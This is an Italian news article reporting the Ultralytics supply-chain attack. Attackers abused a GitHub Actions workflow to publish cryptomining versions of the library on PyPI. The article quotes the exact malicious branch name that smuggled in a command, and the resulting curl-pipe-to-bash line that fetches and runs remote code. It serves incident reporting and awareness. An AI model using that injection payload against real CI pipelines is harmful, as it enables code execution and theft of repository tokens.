Redazione RHC : 8 Dicembre 2024 15:46
È stato attaccato il repository della libreria Python Ultralytics, ampiamente utilizzata nelle attività di visione artificiale. Approfittando di questa vulnerabilità, i criminali informatici hanno pubblicato versioni dannose della libreria su PyPI, progettate per il mining di criptovalute.
La vulnerabilità era associata al pacchetto ultralytics-actions, che automatizza l’avvio di gestori per determinate azioni nel repository. Questo è lo scopo per cui viene utilizzato il meccanismo GitHub Actions. Nel progetto Ultralytics, il gestore collegato all’evento pull_request_target ha chiamato il file format.yml per formattare il codice nelle richieste pull in entrata. Questo file eseguiva comandi shell con modelli di caratteri jolly come:
git pull origin ${{ github.head_ref || github.ref }}
Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?
Stiamo per avviare il corso intermedio in modalità "Live Class", previsto per febbraio.
A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente.
Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato.
Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile.
Contattaci tramite WhatsApp al 375 593 1011 per richiedere ulteriori informazioni oppure scriviti alla casella di posta [email protected]
git config –global utente.nome “${{ input.github_nomeutente }}”
git config –global user.email “${{ input.github_email }}”
Gli aggressori hanno inviato una richiesta pull al repository Ultralytics, specificando la seguente riga come nome del ramo:
openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Ciò ha comportato l’esecuzione del comando:
curl -sSfL raw.githubusercontent.com/…/file.sh | bash
Di conseguenza, gli aggressori hanno avuto accesso ai token del repository e ad altri dati riservati. Si ritiene che abbiano modificato il gestore di pubblicazione per rimuovere la verifica dell’account autorizzato a pubblicare versioni su PyPI e abbiano utilizzato la tecnica di avvelenamento della cache di build di GitHub Actions per inserire i propri dati nella versione.
La prima versione dannosa di Ultralytics, versione 8.3.41, è stata pubblicata su PyPI il 4 dicembre alle 23:51 (MSK) ed eliminata alle 12:15 del giorno successivo. Alle 15:47 è stata pubblicata un’altra versione 8.3.42, che è stata rimossa alle 16:47. Pertanto le versioni dannose sono rimaste disponibili per il download per circa 13 ore. Queste versioni contenevano codice che scaricava il componente di mining XMRig da un server esterno.
Gli sviluppatori hanno risolto rapidamente il problema e hanno rilasciato le versioni correttive 8.3.43 e 8.3.44. Due giorni dopo, però, gli aggressori hanno nuovamente pubblicato le versioni dannose 8.3.45 e 8.3.46, che contenevano un codice diverso. Fino al completamento dell’indagine, si consiglia agli utenti di astenersi dall’installare nuove versioni e di impegnare la versione 8.3.44 come dipendenze.
Una nuova campagna malware per Android sta prendendo di mira i clienti bancari in Brasile, India e Sud-est asiatico, combinando frodi contactless NFC, intercettazione delle chiamate e sfruttamento del...
Google sta testando una nuova funzionalità per migliorare la privacy nella modalità di navigazione in incognito di Chrome su Windows: il blocco degli script in incognito (PrivacySandboxFinge...
Sembra che gli Stati Uniti abbiano già seriamente preso in considerazione il concetto di guerra autonoma. Il jet da combattimento autonomo della DARPA , risulta in grado di combattere senza pilot...
CrowdStrike ha pubblicato il suo Global Threat Report 2025, che documenta un balzo in avanti nel comportamento dei criminali informatici e dei gruppi statali. Gli esperti definiscono il 2024 “l...
Solamente due settimane fa, il robot umanoide prodotto da Figure ha destato in noi grande meraviglia, quando con destrezza ha preso degli indumenti da un paniere dei panni sporchi e li ha collocati al...